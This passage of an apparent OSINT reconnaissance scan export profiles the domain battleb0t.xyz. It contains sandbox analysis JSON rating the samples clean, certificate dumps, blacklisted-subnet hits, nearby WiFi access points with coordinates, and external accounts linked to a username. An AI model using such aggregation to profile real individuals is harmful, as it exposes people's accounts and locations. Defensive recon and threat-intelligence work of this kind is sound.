"\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "P79XNZ7Z.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P79XNZ7Z.txt]- [targetUID: 00000000-00002500]\n Dropped file: "Y54NJROK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Y54NJROK.txt]- [targetUID: 00000000-00003616]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, 
u'description': u'"Cab11C5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1263.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00003616]\n "urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00003616]\n "arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00003616]\n "jquery-3.1.1.min_1_.js" has type "ASCII text with very long lines"- [targetUID: 00000000-00003616]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002500]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003616]\n "Cab11C5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab11C5.tmp]- [targetUID: 00000000-00002500]\n "Tar11C6.tmp" has type "data"- Location: [%TEMP%\\Tar11C6.tmp]- [targetUID: 00000000-00002500]\n 
"ux.converged.login.strings-en.min_szor2ujtsn_b-ik0b744ha2_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: 00000000-00003616]\n "1366x768_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=7 orientation=upper-left xresolution=98 yresolution=106 resolutionunit=2 software=Adobe Photoshop CC 2015 (Windows) datetime=2020:08:31 21:49:19] progressive precision 8 1366x768 components 3"- [targetUID: 00000000-00003616]\n "~DF261B847065F69F2A.TMP" has type "data"- Location: [%TEMP%\\~DF261B847065F69F2A.TMP]- [targetUID: 00000000-00003616]\n "~DF24279E1E17C14A0C.TMP" has type "data"- Location: [%TEMP%\\~DF24279E1E17C14A0C.TMP]- [targetUID: 00000000-00003616]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: 00000000-00003616]\n "~DFE39359F0B84D8997.TMP" has type "data"- Location: [%TEMP%\\~DFE39359F0B84D8997.TMP]- [targetUID: 00000000-00003616]\n "_ECCEEC9E-703B-11ED-B14B-080027175B4B_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: 00000000-00003616]\n "P79XNZ7Z.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P79XNZ7Z.txt]- [targetUID: 00000000-00002500]\n "~DF07DA6377032F108B.TMP" has type "data"- Location: [%TEMP%\\~DF07DA6377032F108B.TMP]- [targetUID: 00000000-00003616]\n "Cab1263.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1263.tmp]- [targetUID: 00000000-00002500]\n "RecoveryStore._F85F23EB-7026-11ED-B14B-080027175B4B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003616]\n "Y54NJROK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Y54NJROK.txt]- [targetUID: 00000000-00003616]'}, {u'category': u'Network Related', u'origin': u'File/Memory', 
u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "aadcdn.msftauth.net"\n Heuristic match: "code.jquery.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 104.196.30.220 on port 443"\n "HTTPS traffic to 152.199.4.44 on port 443"\n "HTTPS traffic to 69.16.175.42 on port 443"\n "HTTPS traffic to 142.251.33.106 on port 443"\n "HTTPS traffic to 52.85.247.99 on port 443"'}], u'threat_level': 0, u'size': 413, u'job_id': u'63867bb52e687907d6210c8b', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], 
u'certificates': [], u'hosts': [u'104.196.30.220', u'152.199.4.44', u'69.16.175.42', u'142.251.33.106', u'52.85.247.99'], u'sha256': u'5991841f0d0b33c05baeab2c866b87b0423a247614eafdffda112de9069a5548', u'sha512': u'73c918827db67a1242b4e24aacbf266560b271eadbf13e6dff0e804c9333cd250d04a691aaf1dc1ed61fb982c698ed098d511a9462a537a9d792cb71690243d8', u'image_file_characteristics': [], u'submissions': [{u'url': No | 104.196.30.220 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | cloudwaysapps.com |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SR.Mandant (Net ID: 00:01:21:30:6F:28) | 50.1188, 8.6843 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/favicon.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:10:12 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [64.226.80.0/20]<br>http://www.voipbl.org/update | 64.226.80.0/20 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.206): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:53 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cloudflare.net | route3.mx.cloudflare.net |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Reddit (Category: social)<br>https://www.reddit.com/user/ayshoo | ayshoo |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.6): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:25 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d5:98:ae:2a:84:a2:19:ac:80:9a:6c:74:76:20:f8:3f:d8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:01 2022 GMT
Not After : Feb 15 09:44:00 2023 GMT
Subject: CN=portainer.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:b5:e1:c5:d7:75:db:34:03:18:a1:ee:7b:4b:
ea:8e:e7:69:4e:39:85:68:38:67:3d:c1:9a:8b:f3:
bd:cf:17:bb:68:6a:65:cf:4a:a8:76:23:7a:4f:20:
df:84:d1:79:b9:6a:69:1e:44:79:b1:f5:77:a0:d1:
57:7d:30:22:17:73:4d:12:ae:da:6f:17:2f:cc:59:
fc:28:b2:56:e2:d1:04:1e:a5:af:0c:cc:00:03:c9:
be:8b:f2:e1:2a:f3:ee:60:20:15:0b:48:ba:bd:47:
ee:af:b8:94:3e:d3:00:b1:a7:9d:eb:e0:5f:7e:6f:
9e:2f:c5:a5:c8:f8:87:92:71:43:69:60:10:5d:de:
5f:ef:16:13:44:c8:38:e1:ab:bf:d4:ba:c9:63:0e:
71:cd:82:05:39:b6:2b:c7:09:a0:3f:7a:0f:d1:b5:
8c:31:e1:64:fb:3e:7d:9c:f0:15:49:3c:98:f1:98:
8a:de:cb:a1:c8:6f:57:47:ea:69:8f:65:04:e8:bd:
1e:d7:20:58:d9:de:ea:65:82:25:f4:8a:20:52:90:
c5:c4:e3:bf:c3:af:cc:ca:46:be:71:d3:24:c0:85:
69:56:27:39:94:2d:43:65:9d:2f:bb:4d:62:7e:14:
0c:45:91:3c:ec:e1:a2:ae:81:70:73:3d:8e:8c:ef:
5a:48:f8:f8:b4:3f:a5:4e:ca:0b:38:80:5d:df:42:
eb:06:32:21:0b:67:44:bf:df:2c:ae:bd:f6:68:1d:
b6:39:c5:d8:57:bc:5e:76:f0:ee:ab:21:2d:35:69:
74:8a:c4:88:bd:d0:3d:91:05:d0:dd:4e:54:8e:e9:
94:fd:a6:9c:7c:35:94:f3:2c:a0:e6:0f:6f:ec:d7:
06:e0:96:b5:94:ae:64:fd:f9:52:45:cc:c0:54:2c:
ae:a7:51:2d:fb:3c:d9:4c:eb:d6:b7:fe:7c:8d:68:
1d:87:d4:dc:09:38:2e:ee:0d:49:32:4c:2b:08:20:
ff:a0:95:02:0a:01:3f:99:e9:bb:d2:97:db:d5:f5:
7d:97:14:d0:18:c5:3f:cf:31:7b:a7:9c:bf:9d:b3:
23:66:83:9e:eb:d9:48:01:38:6c:db:2f:7b:2d:82:
d4:36:d7:86:9f:0b:de:ef:ab:c4:7c:aa:36:24:d0:
9f:9a:47:7a:a3:aa:26:bd:ef:52:90:60:1c:7e:d9:
0d:dc:f1:5b:cb:c0:7c:8b:f6:64:bf:41:76:8c:ba:
34:64:15:cb:49:b9:40:f8:78:ff:c5:eb:99:a1:af:
b3:7a:cb:c9:d0:b9:1b:1a:3d:ef:4c:68:86:22:46:
99:75:81:d3:cf:5c:90:1a:2f:01:4f:59:01:34:82:
5c:f7:3f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6D:D8:A8:24:70:8B:8F:0C:4D:0C:6C:1A:D9:1A:9A:75:25:E5:1A:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:portainer.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:01.511 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:BA:66:A9:AA:5E:0F:A6:67:BA:ED:61:
B9:4A:97:4F:0B:86:A7:57:50:55:B9:A5:69:1B:DC:7C:
65:C9:5B:E4:5B:02:20:6A:38:79:69:94:85:41:86:C0:
4E:33:F0:44:69:54:C5:A9:40:ED:85:BC:5D:66:70:B8:
31:1F:C8:D3:58:B2:89
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 10:44:01.990 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D7:1B:E9:32:CF:B7:9A:93:B2:BF:77:
63:D5:5A:7F:F4:A0:6C:77:51:03:FE:F1:5C:A7:51:2C:
16:22:63:24:9A:02:21:00:E1:61:68:D5:A1:EE:9A:2E:
9E:AF:84:50:74:9E:B6:EB:55:A1:CA:4D:CE:91:07:8D:
31:2D:F6:05:41:96:C7:BF
Signature Algorithm: sha256WithRSAEncryption
a4:99:cc:17:c2:9a:8e:12:57:4b:5f:f3:9f:2c:de:1e:67:a2:
15:f4:c2:a6:9a:37:ce:60:60:9f:eb:7b:4e:d1:f5:56:0a:77:
87:4d:62:42:b9:af:17:7b:da:58:7a:6f:13:64:15:09:4e:90:
23:78:51:46:b5:fd:d4:cc:83:1e:ee:91:6d:c6:56:93:07:ae:
30:b8:d8:e6:ea:e5:86:c8:36:d3:3f:ac:2f:8b:df:14:86:08:
eb:08:79:b4:e2:b8:85:a4:15:71:51:85:18:65:cb:a8:ed:92:
eb:f7:89:15:96:1f:f7:d9:1c:15:d2:aa:fd:8f:7f:2f:0c:fa:
5e:72:7c:3c:89:e8:0c:5a:70:50:ef:1f:1d:93:9d:0a:a2:65:
6b:bc:f9:07:8e:3b:f7:ed:d5:4c:37:b1:48:2b:7b:c8:b0:02:
1d:3a:a2:c7:65:6c:2d:5a:92:f1:fd:51:00:e1:4b:ac:78:1f:
32:ae:7e:03:f4:0b:1f:cf:e7:b2:0f:1e:53:51:4d:d4:41:52:
82:77:57:35:05:af:16:cf:55:87:95:55:14:cd:4c:80:d7:09:
00:5e:46:ac:87:47:23:25:66:0a:6d:de:61:87:1a:7b:22:b8:
5a:2a:93:d2:ac:83:ea:40:df:11:e8:22:85:ab:f2:84:66:88:
cc:de:a7:8a
| battleb0t.xyz |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | London, England, W1B, United States, North America |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Flipboard (Category: tech)<br>https://flipboard.com/@ayshoo | ayshoo |
| 2023-05-12 03:00:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.14): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:17:05 | Username | No | Account Finder | 17 | 0 | 1 | 0 | None | battleb0t | battleb0t.xyz |
| 2023-05-12 02:54:01 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://kurt-defreitas.github.io/img/placeholder.sv', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bd8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_bd8_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_bd8_ConnHashTable<3032>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_bd8_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3032"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_bd8_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_bd8_IE_EarlyTabStart_0xbb8_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"'}, {u'category': 
u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kurt-defreitas.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "en-US.5" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.5]- [targetUID: 00000000-00003032]\n "~DFA2731819B86592CA.TMP" has type "data"- Location: [%TEMP%\\~DFA2731819B86592CA.TMP]- [targetUID: 00000000-00003032]\n "~DFCCC928221FE4ACD8.TMP" has type "data"- Location: [%TEMP%\\~DFCCC928221FE4ACD8.TMP]- [targetUID: 00000000-00003032]\n "~DF3682FED50B1F86F1.TMP" has type "data"- Location: [%TEMP%\\~DF3682FED50B1F86F1.TMP]- [targetUID: 00000000-00003032]\n "~DF9E4BE3D4F707C6B3.TMP" has type "data"- Location: [%TEMP%\\~DF9E4BE3D4F707C6B3.TMP]- [targetUID: 00000000-00003032]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._4536F183-D3A7-11ED-A4A6-080027748A4E_.dat" has type "Composite 
Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_4536F185-D3A7-11ED-A4A6-080027748A4E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_4D880574-D3A7-11ED-A4A6-080027748A4E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "2UHLR4HR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2UHLR4HR.txt]- [targetUID: 00000000-00003032]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "TPFMNZ18.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TPFMNZ18.txt]- [targetUID: 00000000-00003032]\n "HPYEEPFO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HPYEEPFO.txt]- [targetUID: 00000000-00003032]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://kurt-defreitas.github.io/img/placeholder.sv"\n Pattern match: "https://kurt-defreitas.github.io"\n Pattern match: "MUID3901E857A0CA662738CBFA56A18667BBmicrosoft.com/1025411295705631056689247978600330978218*SRCHDAF=NOFORMmicrosoft.com/1024194638604831125287247978600330978218*SRCHUIDV=2&GUID=A9F735962E2A42C3AFD3CAEB5B5F826B&dmnchg=1microsoft.com/1024194638604831125287247"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025333882060831061302120807300431025076*"\n Pattern match: "www.msn.com/"\n Pattern match: "MUIDB3901E857A0CA662738CBFA56A18667BBieonline.microsoft.com/9216244540108831103547120572925431025076*"\n Heuristic match: "kurt-defreitas.github.io"\n 
Pattern match: "kurt-defreitas.github.io/img/placeholder.sv"\n Heuristic match: "urt-defreitas.github.io"\n Heuristic match: "img/placeholder.sv"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\system32\\rundll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\system32\\IEFRAME.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'642d77c048c27e508a04f41c', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 3, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': 
u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'185.199.109.153'], u'sha256': u'f8888b6fa1427ba3882de44e533fed25e64f7f76af4d032bc1a8856df7bb161b', u'sha512': u'c1ecf0ef0a8cc6465fd767beba9a9de0182633eadebdcd46681d32fcecf6bc9a2d40b17032b512656c173c7bf9bc7fba09331efcb1478464d13e4cd84da89283', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://kurt-defreitas.github.io/img/placeholder.sv', u'submission_id': u'642d77c148c27e508a04f41d', u'created_at': u'2023-04-05T13:29:37+00:00', u'filename': None}], u'analysis_start_time': u'2023-04-05T13:42:20+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'c58c917dcf7fa15b312b69ef43d33c3b', u'network_mode': u'default', u'processes': [], u'sha1': u'b112d67b92ef42cae143614cd7ccb3351a327eb8', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': 
[u'kurt-defreitas.github.io'], u'extracted_files': [], u'type_short': []}] | 185.199.109.153 |
| 2023-05-12 02:54:20 | BGP AS Membership | No | Censys | 0 | 0 | 4 | 0 | None | 14618 | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AitchBee13 (Net ID: 00:02:2D:68:90:A6) | 37.7642, -122.3993 |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.io | www.battleb0t.xyz |
| 2023-05-12 02:44:28 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0d:40:8d:d9:7c:a1:bd:4c:0d:06:c5:3f:c3:e9:2e:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Apr 11 04:54:50 2023 GMT
Not After : Jul 10 04:54:49 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:a5:65:fa:d8:79:b7:aa:9f:cd:61:b9:6d:61:bb:
e3:07:27:16:d3:e1:46:58:db:ea:35:f8:26:d8:c8:
09:7e:b6:39:79:12:45:7f:4a:96:c2:65:47:bc:37:
b3:76:46:83:08:24:7b:32:63:f5:07:b6:17:66:20:
18:e4:18:8c:6e:16:7f:bc:81:ec:10:38:cc:20:6d:
2c:d6:29:65:3d:24:15:7a:78:2a:d0:43:3c:46:03:
10:b3:27:47:c6:2c:d9:37:1a:f8:11:aa:82:ad:00:
76:a7:88:0c:2b:f1:1a:b2:9a:95:76:c4:a9:4b:c3:
62:f9:12:87:35:9a:50:60:71:89:06:0b:f5:83:3f:
b3:37:8b:3d:cb:f9:c2:99:ee:99:d3:c8:08:07:e1:
c6:20:fc:1e:cb:95:74:f5:c1:74:33:8b:1b:39:2e:
63:89:98:62:bd:9a:c6:13:b2:b5:95:ec:cb:ee:ce:
27:e7:da:24:f1:8e:b6:e6:ab:e2:7a:20:63:e1:26:
ab:e8:05:03:30:6e:ae:59:d4:02:26:10:36:ee:3d:
2a:f4:c0:78:59:fa:77:cd:2a:88:bd:16:94:1a:e1:
c4:ca:d8:5b:b7:12:2e:db:10:0e:ec:94:77:40:49:
b3:6f:75:18:22:d3:cb:58:3c:44:d0:05:e2:db:a8:
00:c9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BA:51:29:0E:2E:1D:B8:E3:1A:BA:7C:11:8D:3C:69:BB:27:B0:51:A7
X509v3 Authority Key Identifier:
